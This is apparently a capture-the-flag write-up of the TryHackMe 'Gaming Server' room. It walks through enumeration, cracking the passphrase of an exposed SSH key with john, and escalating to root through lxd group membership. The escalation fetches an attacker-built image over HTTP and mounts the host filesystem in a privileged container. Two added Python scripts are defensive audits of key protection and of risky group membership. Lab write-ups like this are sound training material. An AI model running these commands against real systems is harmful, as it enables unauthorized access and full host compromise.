Intro
Hey guys! In this write-up we will go through the Gaming Server room on TryHackMe.
It is an easy room, and we have to find user.txt and root.txt in order to complete it.
Let’s go!
Enumeration
$ nmap -A -T4 -p- -vv -oN Ascan <Target IP>
$ cat Ascan | grep tcp
22/tcp open ssh syn-ack OpenSSH 7.6p1
80/tcp open http syn-ack Apache httpd 2.4.29
Ok, we have only 2 services:
SSH on port 22
HTTP on port 80
Start gobuster and take a look at the HTTP service:
$ gobuster dir -w /usr/share/wordlists/dirbuster/dirmedium.txt -u <Target IP> -t40
Playing around with the website a little, I can’t find anything useful. But if we look at the homepage source, we can spot a possible username in an HTML comment.
From gobuster we retrieve some useful resources:
$ gobuster dir -w /usr/share/wordlists/dirbuster/dirmedium.txt -u <Target IP> -t40
/uploads (Status: 301)
/secret (Status: 301)
/server-status (Status: 403)
Let’s take a look at uploads and secret.
Inside uploads we have something that looks like a dictionary, and we definitely have to grab it; it could be useful later. The manifesto and the meme don’t seem interesting.
$ wget http://<Target IP>/uploads/dict.lst
Bingo! Inside the secret folder we have a private key; grab it onto your attack machine!
$ wget http://<Target IP>/secret/secretKey
Maybe we can log in to the SSH service. In order to use the private key as the identity file, we have to restrict its permissions first (ssh refuses keys readable by other users):
$ chmod 400 secretKey
$ ssh -i secretKey john@<Target IP>
Unfortunately, we can’t log in, as we need to input a passphrase. This should not be a problem: maybe we can use john with the dictionary found inside the uploads folder to crack it. Let’s check.
$ python /usr/share/john/ssh2john.py secretKey > sec.hash
$ john --wordlist=dict.lst sec.hash
Thank you, John! Now we can log in. Hello there!
Once inside, let’s start checking what we have and what we can do.
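As an added example (not part of the original write-up), here is a small Python inspector that shows a defender why a key like this one falls to a wordlist so quickly: it reports whether an OpenSSH private key is encrypted at all and which key-derivation function protects the passphrase. A legacy PEM key (BEGIN RSA PRIVATE KEY with a Proc-Type/DEK-Info header) derives the cipher key from the passphrase with a single MD5 pass, so every guess is cheap; the openssh-key-v1 format uses bcrypt with a configurable round count. The sample keys are constructed inside the script (only the headers are meaningful, the key material is dummy bytes), and the function names are my own.

```python
import base64
import struct

OPENSSH_MAGIC = b"openssh-key-v1\x00"


def _ssh_string(buf: bytes, off: int):
    """Read one SSH wire-format string (uint32 length + bytes) at offset off."""
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n


def inspect_private_key(text: str) -> dict:
    """Classify a private key file by how its passphrase is protected.

    Only the header is parsed; no key material is used or needed.
    """
    lines = [ln.strip() for ln in text.strip().splitlines()]
    if lines[0] == "-----BEGIN OPENSSH PRIVATE KEY-----":
        body = base64.b64decode("".join(lines[1:-1]))
        if not body.startswith(OPENSSH_MAGIC):
            raise ValueError("not an openssh-key-v1 blob")
        off = len(OPENSSH_MAGIC)
        cipher, off = _ssh_string(body, off)
        kdf, off = _ssh_string(body, off)
        kdfopts, off = _ssh_string(body, off)
        rounds = None
        if kdf == b"bcrypt":
            # kdfoptions = string salt, uint32 rounds
            _salt, o = _ssh_string(kdfopts, 0)
            (rounds,) = struct.unpack(">I", kdfopts[o:o + 4])
        encrypted = cipher != b"none"
        if not encrypted:
            assessment = "unencrypted: anyone holding the file can use it"
        elif rounds is not None and rounds >= 16:
            assessment = f"bcrypt with {rounds} rounds: each offline guess is expensive"
        else:
            assessment = f"bcrypt with only {rounds} rounds: raise it with ssh-keygen -p -a <rounds>"
        return {"format": "openssh-key-v1", "encrypted": encrypted,
                "cipher": cipher.decode(), "kdf": kdf.decode(),
                "rounds": rounds, "assessment": assessment}

    if lines[0].startswith("-----BEGIN ") and "PRIVATE KEY-----" in lines[0]:
        headers = {}
        for ln in lines[1:]:
            if ln == "" or ":" not in ln:   # base64 lines never contain ':'
                break
            k, v = ln.split(":", 1)
            headers[k.strip()] = v.strip()
        encrypted = headers.get("Proc-Type", "").startswith("4,")   # "4,ENCRYPTED"
        dek = headers.get("DEK-Info", "")
        if encrypted:
            assessment = ("legacy PEM: key derived with one MD5 pass (EVP_BytesToKey), "
                          "cheap to guess offline; convert with ssh-keygen -p -o")
        else:
            assessment = "unencrypted legacy PEM: anyone holding the file can use it"
        return {"format": "pem", "encrypted": encrypted,
                "cipher": dek.split(",")[0] if dek else None,
                "kdf": "EVP_BytesToKey(MD5)" if encrypted else None,
                "rounds": 1 if encrypted else None, "assessment": assessment}
    raise ValueError("unrecognised key file")


def make_sample_openssh_key(cipher: str, kdf: str, rounds: int) -> str:
    """Constructed sample: a well-formed openssh-key-v1 header followed by dummy bytes."""
    def s(b: bytes) -> bytes:
        return struct.pack(">I", len(b)) + b
    kdfopts = b""
    if kdf == "bcrypt":
        kdfopts = s(b"\x00" * 16) + struct.pack(">I", rounds)   # dummy salt + rounds
    blob = (OPENSSH_MAGIC + s(cipher.encode()) + s(kdf.encode()) + s(kdfopts)
            + struct.pack(">I", 1) + b"\x00" * 32)              # nkeys=1, dummy tail
    b64 = base64.b64encode(blob).decode()
    wrapped = "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{wrapped}\n-----END OPENSSH PRIVATE KEY-----\n"


# Constructed legacy PEM sample (headers only; the body is dummy base64).
LEGACY_SAMPLE = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-----END RSA PRIVATE KEY-----
"""

if __name__ == "__main__":
    for sample in (LEGACY_SAMPLE,
                   make_sample_openssh_key("aes256-ctr", "bcrypt", 16),
                   make_sample_openssh_key("none", "none", 0)):
        print(inspect_private_key(sample))
```

Run it against a real key with inspect_private_key(open("secretKey").read()): a legacy PEM or a low round count is the cue to re-encrypt the key and, for a key that was reachable over HTTP as this one was, to rotate it.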
Inside john’s home directory there is the user flag.
john@exploitable:~$ ls
user.txt
Let’s get the root now.
Privilege Escalation
john@exploitable:~$ id
uid=1000(john) gid=1000(john) groups=1000(john),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
As we can see, john is in the lxd group. We can use this to escalate our privileges. To do so, I suggest you read this post from Hacking Articles.
Let’s do it. On our attack machine, let’s build an image to import and start an HTTP server so we can wget it from the target machine:
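Membership of lxd is what makes this box fall, so here is an added audit script (my own, not part of the write-up or of any tool the room uses) that a defender can run on a host to list who holds membership of groups that are effectively root. It reads /etc/group and /etc/passwd (primary groups only appear in the latter) and reports the accounts per sensitive group with the reason each group matters. The sample files are constructed to mirror the id output above.

```python
from __future__ import annotations

import os

# Groups whose membership is effectively root or otherwise sensitive, with the reason.
SENSITIVE_GROUPS = {
    "lxd": "can launch a privileged container with the host filesystem mounted (root-equivalent)",
    "docker": "can run containers that mount the host filesystem (root-equivalent)",
    "sudo": "may run commands as root, subject to /etc/sudoers",
    "wheel": "may run commands as root, subject to /etc/sudoers",
    "disk": "raw access to block devices, bypassing file permissions",
    "adm": "can read system logs under /var/log",
}


def sensitive_members(group_text: str, passwd_text: str) -> dict[str, list[str]]:
    """Return {group: [users]} for every sensitive group that has at least one member."""
    by_name: dict[str, set[str]] = {}
    by_gid: dict[str, str] = {}
    for line in group_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        name, _pw, gid, userlist = line.split(":", 3)
        by_name[name] = {u for u in userlist.split(",") if u}
        by_gid[gid] = name
    # A user's primary group is recorded in /etc/passwd, not in the member list.
    for line in passwd_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        user, _pw, _uid, gid, *_rest = line.split(":")
        gname = by_gid.get(gid)
        if gname is not None:
            by_name.setdefault(gname, set()).add(user)
    return {g: sorted(by_name[g]) for g in SENSITIVE_GROUPS if by_name.get(g)}


def report(findings: dict[str, list[str]]) -> list[str]:
    """One human-readable line per finding."""
    return [f"{g}: {', '.join(users)} -> {SENSITIVE_GROUPS[g]}"
            for g, users in findings.items()]


# Constructed samples mirroring the groups seen in the id output on this box.
GROUP_SAMPLE = """root:x:0:
adm:x:4:syslog,john
sudo:x:27:john
lxd:x:108:john
john:x:1000:
"""
PASSWD_SAMPLE = """root:x:0:0:root:/root:/bin/bash
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
john:x:1000:1000:john:/home/john:/bin/bash
"""

if __name__ == "__main__":
    if os.path.exists("/etc/group") and os.path.exists("/etc/passwd"):
        with open("/etc/group") as g, open("/etc/passwd") as p:
            findings = sensitive_members(g.read(), p.read())
    else:
        findings = sensitive_members(GROUP_SAMPLE, PASSWD_SAMPLE)
    for line in report(findings):
        print(line)
```

The fix for what the script flags is administrative rather than technical: an account that does not need to manage containers should not be in lxd or docker, because those groups grant the same access as root without going through sudo and its logging.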
$ git clone https://github.com/saghul/lxd-alpine-builder.git
$ cd lxd-alpine-builder
$ ./build-alpine
$ python3 -m http.server
Let’s go back to the target machine (python3 -m http.server listens on port 8000 by default):
john@exploitable:~$ cd /tmp
john@exploitable:/tmp$ wget http://<Your IP>:8000/imagefilename.tar.gz
Now import the image, then check that it is listed:
john@exploitable:/tmp$ lxc image import ./imagefilename.tar.gz --alias myimage
john@exploitable:/tmp$ lxc image list
And it’s there! Awesome.
john@exploitable:/tmp$ lxc init myimage ignite -c security.privileged=true
john@exploitable:/tmp$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
john@exploitable:/tmp$ lxc start ignite
john@exploitable:/tmp$ lxc exec ignite /bin/sh
~ # id
uid=0(root) gid=0(root)
~ #
And voilà!
To grab root.txt we have to go to the host’s root directory via the mounted path: /mnt/root/root
~ # cd /mnt/root/root
/mnt/root/root # ls
root.txt
Conclusion
Very straightforward, easy box. I’ve already found this kind of privesc in another room, and I think the whole container universe is very interesting for these purposes.
I hope someone finds this useful and enjoyable.
Stay safe.